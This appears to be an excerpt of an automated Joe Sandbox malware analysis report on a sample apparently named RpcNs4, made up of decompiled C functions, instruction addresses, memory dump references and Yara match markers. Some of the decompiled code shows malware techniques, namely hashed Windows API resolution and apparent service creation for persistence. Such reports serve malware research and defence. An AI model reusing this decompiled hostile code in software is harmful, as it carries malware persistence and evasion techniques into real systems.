                                                                                                      								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
                                                                                                      								if(_t228 != 0) {
                                                                                                      									goto L78;
                                                                                                      								}
                                                                                                      								goto L29;
                                                                                                      							}
                                                                                                      							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
                                                                                                      							if(_t228 != 0) {
                                                                                                      								goto L78;
                                                                                                      							}
                                                                                                      							goto L27;
                                                                                                      						}
                                                                                                      						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
                                                                                                      						if(_t228 != 0) {
                                                                                                      							goto L78;
                                                                                                      						}
                                                                                                      						goto L25;
                                                                                                      					}
                                                                                                      					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
                                                                                                      					if(_t311 == 0) {
                                                                                                      						L14:
                                                                                                      						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
                                                                                                      						if(_t313 == 0) {
                                                                                                      							L16:
                                                                                                      							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
                                                                                                      							if(_t315 == 0) {
                                                                                                      								L18:
                                                                                                      								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
                                                                                                      								if(_t228 != 0) {
                                                                                                      									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                                                                      								}
                                                                                                      								goto L21;
                                                                                                      							}
                                                                                                      							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
                                                                                                      							if(_t228 != 0) {
                                                                                                      								goto L78;
                                                                                                      							}
                                                                                                      							goto L18;
                                                                                                      						}
                                                                                                      						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
                                                                                                      						if(_t228 != 0) {
                                                                                                      							goto L78;
                                                                                                      						}
                                                                                                      						goto L16;
                                                                                                      					}
                                                                                                      					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
                                                                                                      					if(_t228 != 0) {
                                                                                                      						goto L78;
                                                                                                      					}
                                                                                                      					goto L14;
                                                                                                      				}
                                                                                                      				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                                                                      				if(_t317 == 0) {
                                                                                                      					L3:
                                                                                                      					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
                                                                                                      					if(_t319 == 0) {
                                                                                                      						L5:
                                                                                                      						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
                                                                                                      						if(_t321 == 0) {
                                                                                                      							L7:
                                                                                                      							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
                                                                                                      							if(_t228 != 0) {
                                                                                                      								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                                                                      							}
                                                                                                      							goto L10;
                                                                                                      						}
                                                                                                      						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
                                                                                                      						if(_t228 != 0) {
                                                                                                      							goto L78;
                                                                                                      						}
                                                                                                      						goto L7;
                                                                                                      					}
                                                                                                      					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
                                                                                                      					if(_t228 != 0) {
                                                                                                      						goto L78;
                                                                                                      					}
                                                                                                      					goto L5;
                                                                                                      				}
                                                                                                      				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
                                                                                                      				if(_t228 != 0) {
                                                                                                      					goto L78;
                                                                                                      				}
                                                                                                      				goto L3;
                                                                                                      			}


































                                                                                                      0x004160cc
                                                                                                      0x004160cc
                                                                                                      0x004160cc
                                                                                                      0x004160d2
                                                                                                      0x00416159
                                                                                                      0x0041615b
                                                                                                      0x0041615d
                                                                                                      0x004164dc
                                                                                                      0x004164dc
                                                                                                      0x004172cd
                                                                                                      0x004172cd
                                                                                                      0x00416163
                                                                                                      0x00416169
                                                                                                      0x004161f0
                                                                                                      0x004161f2
                                                                                                      0x004161f4
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004161fa
                                                                                                      0x00416200
                                                                                                      0x00416287
                                                                                                      0x00416289
                                                                                                      0x0041628b
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416291
                                                                                                      0x00416297
                                                                                                      0x0041631e
                                                                                                      0x00416320
                                                                                                      0x00416322
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0041632e
                                                                                                      0x004163b6
                                                                                                      0x004163b8
                                                                                                      0x004163ba
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004163c0
                                                                                                      0x004163c6
                                                                                                      0x0041644d
                                                                                                      0x0041644f
                                                                                                      0x00416451
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416457
                                                                                                      0x0041645d
                                                                                                      0x004164d4
                                                                                                      0x004164d6
                                                                                                      0x004164d8
                                                                                                      0x004164da
                                                                                                      0x004164da
                                                                                                      0x00000000
                                                                                                      0x004164d8
                                                                                                      0x00416466
                                                                                                      0x00416468
                                                                                                      0x0041647c
                                                                                                      0x00416484
                                                                                                      0x00416486
                                                                                                      0x0041649a
                                                                                                      0x004164a2
                                                                                                      0x004164a4
                                                                                                      0x004164b8
                                                                                                      0x004164c0
                                                                                                      0x004164c2
                                                                                                      0x004164cb
                                                                                                      0x004164cb
                                                                                                      0x00000000
                                                                                                      0x004164c2
                                                                                                      0x004164ad
                                                                                                      0x004164b6
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004164b6
                                                                                                      0x0041648f
                                                                                                      0x00416498
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416498
                                                                                                      0x00416471
                                                                                                      0x0041647a
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0041647a
                                                                                                      0x004163d3
                                                                                                      0x004163d5
                                                                                                      0x004163ed
                                                                                                      0x004163f5
                                                                                                      0x004163f7
                                                                                                      0x0041640f
                                                                                                      0x00416417
                                                                                                      0x00416419
                                                                                                      0x00416431
                                                                                                      0x00416439
                                                                                                      0x0041643b
                                                                                                      0x00416444
                                                                                                      0x00416444
                                                                                                      0x00000000
                                                                                                      0x0041643b
                                                                                                      0x00416422
                                                                                                      0x0041642b
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0041642b
                                                                                                      0x00416400
                                                                                                      0x00416409
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416409
                                                                                                      0x004163de
                                                                                                      0x004163e7
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004163e7
                                                                                                      0x0041633c
                                                                                                      0x0041633e
                                                                                                      0x00416356
                                                                                                      0x0041635e
                                                                                                      0x00416360
                                                                                                      0x00416378
                                                                                                      0x00416380
                                                                                                      0x00416382
                                                                                                      0x0041639a
                                                                                                      0x004163a2
                                                                                                      0x004163a4
                                                                                                      0x004163ad
                                                                                                      0x004163ad
                                                                                                      0x00000000
                                                                                                      0x004163a4
                                                                                                      0x0041638b
                                                                                                      0x00416394
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416394
                                                                                                      0x00416369
                                                                                                      0x00416372
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416372
                                                                                                      0x00416347
                                                                                                      0x00416350
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416350
                                                                                                      0x004162a4
                                                                                                      0x004162a6
                                                                                                      0x004162be
                                                                                                      0x004162c6
                                                                                                      0x004162c8
                                                                                                      0x004162e0
                                                                                                      0x004162e8
                                                                                                      0x004162ea
                                                                                                      0x00416302
                                                                                                      0x0041630a
                                                                                                      0x0041630c
                                                                                                      0x00416315
                                                                                                      0x00416315
                                                                                                      0x00000000
                                                                                                      0x0041630c
                                                                                                      0x004162f3
                                                                                                      0x004162fc
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004162fc
                                                                                                      0x004162d1
                                                                                                      0x004162da
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004162da
                                                                                                      0x004162af
                                                                                                      0x004162b8
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004162b8
                                                                                                      0x0041620d
                                                                                                      0x0041620f
                                                                                                      0x00416227
                                                                                                      0x0041622f
                                                                                                      0x00416231
                                                                                                      0x00416249
                                                                                                      0x00416251
                                                                                                      0x00416253
                                                                                                      0x0041626b
                                                                                                      0x00416273
                                                                                                      0x00416275
                                                                                                      0x0041627e
                                                                                                      0x0041627e
                                                                                                      0x00000000
                                                                                                      0x00416275
                                                                                                      0x0041625c
                                                                                                      0x00416265
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416265
                                                                                                      0x0041623a
                                                                                                      0x00416243
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416243
                                                                                                      0x00416218
                                                                                                      0x00416221
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416221
                                                                                                      0x00416176
                                                                                                      0x00416178
                                                                                                      0x00416190
                                                                                                      0x00416198
                                                                                                      0x0041619a
                                                                                                      0x004161b2
                                                                                                      0x004161ba
                                                                                                      0x004161bc
                                                                                                      0x004161d4
                                                                                                      0x004161dc
                                                                                                      0x004161de
                                                                                                      0x004161e7
                                                                                                      0x004161e7
                                                                                                      0x00000000
                                                                                                      0x004161de
                                                                                                      0x004161c5
                                                                                                      0x004161ce
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004161ce
                                                                                                      0x004161a3
                                                                                                      0x004161ac
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004161ac
                                                                                                      0x00416181
                                                                                                      0x0041618a
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0041618a
                                                                                                      0x004160df
                                                                                                      0x004160e1
                                                                                                      0x004160f9
                                                                                                      0x00416101
                                                                                                      0x00416103
                                                                                                      0x0041611b
                                                                                                      0x00416123
                                                                                                      0x00416125
                                                                                                      0x0041613d
                                                                                                      0x00416145
                                                                                                      0x00416147
                                                                                                      0x00416150
                                                                                                      0x00416150
                                                                                                      0x00000000
                                                                                                      0x00416147
                                                                                                      0x0041612e
                                                                                                      0x00416137
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416137
                                                                                                      0x0041610c
                                                                                                      0x00416115
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416115
                                                                                                      0x004160ea
                                                                                                      0x004160f3
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                      • Instruction ID: 93e6f77fd8daa23949c0989f16fd56e1ba36159d6bc17e5db1c235ab97b75544
                                                                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                      • Instruction Fuzzy Hash: 54C186322051A30EDF5D4639C4340BFBBA55AA17B131B07AFD8B6CB2C5EE28C5A5D61C
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 65%
                                                                                                      			E020B8830() {
                                                                                                      				char _v520;
                                                                                                      				void* _v524;
                                                                                                      				intOrPtr _v576;
                                                                                                      				void* __ebx;
                                                                                                      				void* __ebp;
                                                                                                      				void* _t11;
                                                                                                      				intOrPtr* _t12;
                                                                                                      				void* _t17;
                                                                                                      				intOrPtr* _t25;
                                                                                                      				intOrPtr* _t29;
                                                                                                      				intOrPtr* _t32;
                                                                                                      				void* _t35;
                                                                                                      				intOrPtr _t47;
                                                                                                      				intOrPtr* _t56;
                                                                                                      				intOrPtr _t58;
                                                                                                      				void* _t59;
                                                                                                      				intOrPtr _t60;
                                                                                                      				short* _t62;
                                                                                                      				intOrPtr _t63;
                                                                                                      				void* _t64;
                                                                                                      				void* _t66;
                                                                                                      				void* _t67;
                                                                                                      
                                                                                                      				_t64 =  &_v524;
                                                                                                      				_t58 = 0;
                                                                                                      				_t11 = 0x4ca1f2b;
                                                                                                      				_v524 = 0;
                                                                                                      				_t35 = _v524;
                                                                                                      				_t63 = _v524;
                                                                                                      				_t60 = _v524;
                                                                                                      				goto L1;
                                                                                                      				do {
                                                                                                      					while(1) {
                                                                                                      						L1:
                                                                                                      						_t66 = _t11 - 0x18939fc0;
                                                                                                      						if(_t66 > 0) {
                                                                                                      							goto L20;
                                                                                                      						}
                                                                                                      						L2:
                                                                                                      						if(_t66 == 0) {
                                                                                                      							_t25 =  *0x20bdd78;
                                                                                                      							if(_t25 == 0) {
                                                                                                      								_t25 = E020B3DD0(_t35, E020B3E70(0x60f9cb2), 0x70adb3c9, _t63);
                                                                                                      								 *0x20bdd78 = _t25;
                                                                                                      							}
                                                                                                      							 *_t25(_t35);
                                                                                                      							goto L36;
                                                                                                      						} else {
                                                                                                      							_t67 = _t11 - 0x10cf1835;
                                                                                                      							if(_t67 > 0) {
                                                                                                      								if(_t11 != 0x15f1b479) {
                                                                                                      									break;
                                                                                                      								} else {
                                                                                                      									_t62 =  *0x20be368 + 0x14;
                                                                                                      									while( *_t62 != 0x5c) {
                                                                                                      										_t62 = _t62 + 2;
                                                                                                      									}
                                                                                                      									_t60 = _t62 + 2;
                                                                                                      									_t11 = 0x10cf1835;
                                                                                                      									continue;
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								if(_t67 == 0) {
                                                                                                      									_t29 =  *0x20bdcb4;
                                                                                                      									if(_t29 == 0) {
                                                                                                      										_t29 = E020B3DD0(_t35, E020B3E70(0x60f9cb2), 0x5f982ae8, _t63);
                                                                                                      										 *0x20bdcb4 = _t29;
                                                                                                      									}
                                                                                                      									_t35 =  *_t29(0, 0, 0xf003f);
                                                                                                      									if(_t35 == 0) {
                                                                                                      										L36:
                                                                                                      										return _t58;
                                                                                                      									} else {
                                                                                                      										_t11 = 0x3084d195;
                                                                                                      										continue;
                                                                                                      									}
                                                                                                      								} else {
                                                                                                      									if(_t11 == 0x4ca1f2b) {
                                                                                                      										_t11 = 0x360409bf;
                                                                                                      										continue;
                                                                                                      									} else {
                                                                                                      										if(_t11 != 0x7f4f3d3) {
                                                                                                      											break;
                                                                                                      										} else {
                                                                                                      											_t32 =  *0x20bdd78;
                                                                                                      											if(_t32 == 0) {
                                                                                                      												_t32 = E020B3DD0(_t35, E020B3E70(0x60f9cb2), 0x70adb3c9, _t63);
                                                                                                      												 *0x20bdd78 = _t32;
                                                                                                      											}
                                                                                                      											 *_t32(_t63);
                                                                                                      											L10:
                                                                                                      											_t11 = 0x18939fc0;
                                                                                                      											while(1) {
                                                                                                      												L1:
                                                                                                      												_t66 = _t11 - 0x18939fc0;
                                                                                                      												if(_t66 > 0) {
                                                                                                      													goto L20;
                                                                                                      												}
                                                                                                      												goto L2;
                                                                                                      											}
                                                                                                      											goto L20;
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						L37:
                                                                                                      						L20:
                                                                                                      						if(_t11 == 0x3084d195) {
                                                                                                      							_t12 =  *0x20bdf8c;
                                                                                                      							if(_t12 == 0) {
                                                                                                      								_t12 = E020B3DD0(_t35, E020B3E70(0x60f9cb2), 0xe2820d72, _t63);
                                                                                                      								 *0x20bdf8c = _t12;
                                                                                                      							}
                                                                                                      							_t63 =  *_t12(_t35, _t60, _t60, 2, 0x10, 2, 0,  &_v520, 0, 0, 0, 0, 0);
                                                                                                      							if(_t63 == 0) {
                                                                                                      								goto L10;
                                                                                                      							} else {
                                                                                                      								_t58 = 1;
                                                                                                      								_t11 = 0x348f3915;
                                                                                                      								_v576 = 1;
                                                                                                      							}
                                                                                                      							continue;
                                                                                                      						} else {
                                                                                                      							if(_t11 == 0x348f3915) {
                                                                                                      								E020B4FB0(_t35, _t63);
                                                                                                      								_t11 = 0x7f4f3d3;
                                                                                                      								continue;
                                                                                                      							} else {
                                                                                                      								if(_t11 != 0x360409bf) {
                                                                                                      									break;
                                                                                                      								} else {
                                                                                                      									_t17 = E020B3460(0x20bd9e0);
                                                                                                      									_t56 =  *0x20bdf10;
                                                                                                      									_t59 = _t17;
                                                                                                      									if(_t56 == 0) {
                                                                                                      										_t56 = E020B3DD0(_t35, E020B3E70(0xe60124ba), 0xec538b3a, _t63);
                                                                                                      										 *0x20bdf10 = _t56;
                                                                                                      									}
                                                                                                      									_t47 =  *0x20be368;
                                                                                                      									 *_t56( &_v520, 0x104, _t59, _t47 + 0x220, _t47 + 0x14);
                                                                                                      									_t64 = _t64 + 0x14;
                                                                                                      									E020B3400(_t59);
                                                                                                      									_t58 = _v524;
                                                                                                      									_t11 = 0x15f1b479;
                                                                                                      									continue;
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						goto L37;
                                                                                                      					}
                                                                                                      				} while (_t11 != 0x121f9a16);
                                                                                                      				return _t58;
                                                                                                      				goto L37;
                                                                                                      			}

























                                                                                                      0x020b8830
                                                                                                      0x020b883a
                                                                                                      0x020b883c
                                                                                                      0x020b8841
                                                                                                      0x020b8845
                                                                                                      0x020b8849
                                                                                                      0x020b884d
                                                                                                      0x020b884d
                                                                                                      0x020b8851
                                                                                                      0x020b8851
                                                                                                      0x020b8851
                                                                                                      0x020b8851
                                                                                                      0x020b8856
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b885c
                                                                                                      0x020b885c
                                                                                                      0x020b8a38
                                                                                                      0x020b8a3f
                                                                                                      0x020b8a52
                                                                                                      0x020b8a57
                                                                                                      0x020b8a57
                                                                                                      0x020b8a5d
                                                                                                      0x00000000
                                                                                                      0x020b8862
                                                                                                      0x020b8862
                                                                                                      0x020b8867
                                                                                                      0x020b88fe
                                                                                                      0x00000000
                                                                                                      0x020b8904
                                                                                                      0x020b890a
                                                                                                      0x020b8911
                                                                                                      0x020b8913
                                                                                                      0x020b8916
                                                                                                      0x020b891c
                                                                                                      0x020b891f
                                                                                                      0x00000000
                                                                                                      0x020b891f
                                                                                                      0x020b886d
                                                                                                      0x020b886d
                                                                                                      0x020b88b6
                                                                                                      0x020b88bd
                                                                                                      0x020b88d0
                                                                                                      0x020b88d5
                                                                                                      0x020b88d5
                                                                                                      0x020b88e5
                                                                                                      0x020b88e9
                                                                                                      0x020b8a5f
                                                                                                      0x020b8a6b
                                                                                                      0x020b88ef
                                                                                                      0x020b88ef
                                                                                                      0x00000000
                                                                                                      0x020b88ef
                                                                                                      0x020b886f
                                                                                                      0x020b8874
                                                                                                      0x020b88af
                                                                                                      0x00000000
                                                                                                      0x020b8876
                                                                                                      0x020b887b
                                                                                                      0x00000000
                                                                                                      0x020b8881
                                                                                                      0x020b8881
                                                                                                      0x020b8888
                                                                                                      0x020b889b
                                                                                                      0x020b88a0
                                                                                                      0x020b88a0
                                                                                                      0x020b88a6
                                                                                                      0x020b88a8
                                                                                                      0x020b88a8
                                                                                                      0x020b8851
                                                                                                      0x020b8851
                                                                                                      0x020b8851
                                                                                                      0x020b8856
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b8856
                                                                                                      0x00000000
                                                                                                      0x020b8851
                                                                                                      0x020b887b
                                                                                                      0x020b8874
                                                                                                      0x020b886d
                                                                                                      0x020b8867
                                                                                                      0x00000000
                                                                                                      0x020b8929
                                                                                                      0x020b892e
                                                                                                      0x020b89db
                                                                                                      0x020b89e2
                                                                                                      0x020b89f5
                                                                                                      0x020b89fa
                                                                                                      0x020b89fa
                                                                                                      0x020b8a1b
                                                                                                      0x020b8a1f
                                                                                                      0x00000000
                                                                                                      0x020b8a25
                                                                                                      0x020b8a25
                                                                                                      0x020b8a2a
                                                                                                      0x020b8a2f
                                                                                                      0x020b8a2f
                                                                                                      0x00000000
                                                                                                      0x020b8934
                                                                                                      0x020b8939
                                                                                                      0x020b89cc
                                                                                                      0x020b89d1
                                                                                                      0x00000000
                                                                                                      0x020b893f
                                                                                                      0x020b8944
                                                                                                      0x00000000
                                                                                                      0x020b8946
                                                                                                      0x020b894b
                                                                                                      0x020b8950
                                                                                                      0x020b8956
                                                                                                      0x020b895a
                                                                                                      0x020b8972
                                                                                                      0x020b8974
                                                                                                      0x020b8974
                                                                                                      0x020b897a
                                                                                                      0x020b8996
                                                                                                      0x020b8998
                                                                                                      0x020b899d
                                                                                                      0x020b89a2
                                                                                                      0x020b89a6
                                                                                                      0x00000000
                                                                                                      0x020b89a6
                                                                                                      0x020b8944
                                                                                                      0x020b8939
                                                                                                      0x00000000
                                                                                                      0x020b892e
                                                                                                      0x020b89b0
                                                                                                      0x020b89c7
                                                                                                      0x00000000

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: bf24377065e196552bf351b68b1a069537163b2f31350834e3111dd385cb1e27
                                                                                                      • Instruction ID: 5fb37e9237aeef7ae08846ac1426e7e975ac5eeb318e619f447f6b645ed299c2
                                                                                                      • Opcode Fuzzy Hash: bf24377065e196552bf351b68b1a069537163b2f31350834e3111dd385cb1e27
                                                                                                      • Instruction Fuzzy Hash: F3512664B0030597DF37AB6498587FE72DAEFC4304F28882EE945DB2A0DB74DC41A792
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E020B4D60() {
                                                                                                      
                                                                                                      				return  *[fs:0x30];
                                                                                                      			}



                                                                                                      0x020b4d66

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 71%
                                                                                                      			E0040BA7D(void* __edx, signed int* _a4) {
                                                                                                      				signed int _v8;
                                                                                                      				char _v16;
                                                                                                      				char _v24;
                                                                                                      				char _v122;
                                                                                                      				char _v123;
                                                                                                      				char _v124;
                                                                                                      				char _v128;
                                                                                                      				char _v132;
                                                                                                      				signed int _v136;
                                                                                                      				signed int _v140;
                                                                                                      				char _v148;
                                                                                                      				char _v156;
                                                                                                      				char _v164;
                                                                                                      				char _v172;
                                                                                                      				char _v180;
                                                                                                      				char _v188;
                                                                                                      				char _v196;
                                                                                                      				char _v204;
                                                                                                      				void* __ebx;
                                                                                                      				void* __edi;
                                                                                                      				void* __esi;
                                                                                                      				signed int _t53;
                                                                                                      				intOrPtr* _t55;
                                                                                                      				char* _t56;
                                                                                                      				void* _t87;
                                                                                                      				void* _t101;
                                                                                                      				char _t110;
                                                                                                      				intOrPtr _t116;
                                                                                                      				char* _t133;
                                                                                                      				intOrPtr _t151;
                                                                                                      				signed int* _t152;
                                                                                                      				signed int _t153;
                                                                                                      				void* _t156;
                                                                                                      
                                                                                                      				_t150 = __edx;
                                                                                                      				_t53 =  *0x435040; // 0x4b97bcea
                                                                                                      				_v8 = _t53 ^ _t153;
                                                                                                      				_t55 =  *0x4376d4; // 0x0
                                                                                                      				_t152 = _a4;
                                                                                                      				_t116 =  *_t55;
                                                                                                      				_t56 = _t55 + 1;
                                                                                                      				_t151 = _t116;
                                                                                                      				 *0x4376d4 = _t56;
                                                                                                      				_t156 = _t151 - 0x45;
                                                                                                      				if(_t156 > 0) {
                                                                                                      					if(_t151 <= 0x4a) {
                                                                                                      						E00406FCF( &_v132, 0x7b);
                                                                                                      						if(_t116 <= 2) {
                                                                                                      							E004076FC( &_v132, E0040980B(__edx,  &_v180));
                                                                                                      							E0040773F( &_v132, 0x2c);
                                                                                                      						}
                                                                                                      						_t151 = _t151 - 0x46;
                                                                                                      						if(_t151 == 0) {
                                                                                                      							L48:
                                                                                                      							E004076FC( &_v132, E0040B56E(_t150,  &_v172));
                                                                                                      							E0040773F( &_v132, 0x2c);
                                                                                                      							goto L49;
                                                                                                      						} else {
                                                                                                      							_t151 = _t151 - 1;
                                                                                                      							if(_t151 == 0) {
                                                                                                      								L47:
                                                                                                      								E004076FC( &_v132, E0040B56E(_t150,  &_v156));
                                                                                                      								E0040773F( &_v132, 0x2c);
                                                                                                      								goto L48;
                                                                                                      							} else {
                                                                                                      								_t151 = _t151 - 1;
                                                                                                      								if(_t151 == 0) {
                                                                                                      									L49:
                                                                                                      									E004076FC( &_v132, E0040B56E(_t150,  &_v188));
                                                                                                      								} else {
                                                                                                      									_t151 = _t151 - 1;
                                                                                                      									if(_t151 == 0) {
                                                                                                      										goto L48;
                                                                                                      									} else {
                                                                                                      										if(_t151 == 0) {
                                                                                                      											goto L47;
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						E00407674( &_v132, _t152, 0x7d);
                                                                                                      					} else {
                                                                                                      						if(_t151 == 0x51) {
                                                                                                      							goto L7;
                                                                                                      						} else {
                                                                                                      							if(_t151 == 0x52) {
                                                                                                      								L34:
                                                                                                      								E0040C696(_t150,  &_v140, 0, 0);
                                                                                                      								E0040B56E(_t150,  &_v132);
                                                                                                      								 *_t152 = _v140;
                                                                                                      								_t152[1] = _v136;
                                                                                                      							} else {
                                                                                                      								if(_t151 == 0x53) {
                                                                                                      									 *_t152 =  *_t152 & 0x00000000;
                                                                                                      									_t152[1] = 0;
                                                                                                      									_t152[1] = _t152[1] & 0xffff00ff;
                                                                                                      								} else {
                                                                                                      									if(_t151 != 0x54) {
                                                                                                      										goto L13;
                                                                                                      									} else {
                                                                                                      										goto L34;
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      				} else {
                                                                                                      					if(_t156 == 0) {
                                                                                                      						E0040980B(__edx, _t152);
                                                                                                      						goto L25;
                                                                                                      					} else {
                                                                                                      						_t151 = _t151;
                                                                                                      						if(_t151 == 0) {
                                                                                                      							 *0x4376d4 = _t56 - 1;
                                                                                                      							goto L27;
                                                                                                      						} else {
                                                                                                      							_t151 = _t151 - 0x30;
                                                                                                      							if(_t151 == 0) {
                                                                                                      								E0040B56E(__edx, _t152);
                                                                                                      								L25:
                                                                                                      							} else {
                                                                                                      								_t151 = _t151 - 1;
                                                                                                      								if(_t151 == 0) {
                                                                                                      									if( *_t56 != 0x40) {
                                                                                                      										_push(E0040980B(__edx,  &_v204));
                                                                                                      										_push(_t152);
                                                                                                      										_t101 = E00407048( &_v148, "&");
                                                                                                      										goto L19;
                                                                                                      									} else {
                                                                                                      										 *0x4376d4 = _t56 + 1;
                                                                                                      										_push("NULL");
                                                                                                      										goto L22;
                                                                                                      									}
                                                                                                      								} else {
                                                                                                      									_t151 = _t151 - 1;
                                                                                                      									if(_t151 == 0) {
                                                                                                      										E0040B56E(__edx,  &_v132);
                                                                                                      										E0040B56E(__edx,  &_v140);
                                                                                                      										if(_v128 > 1 || _v136 > 1) {
                                                                                                      											L27:
                                                                                                      											_push(1);
                                                                                                      											goto L14;
                                                                                                      										} else {
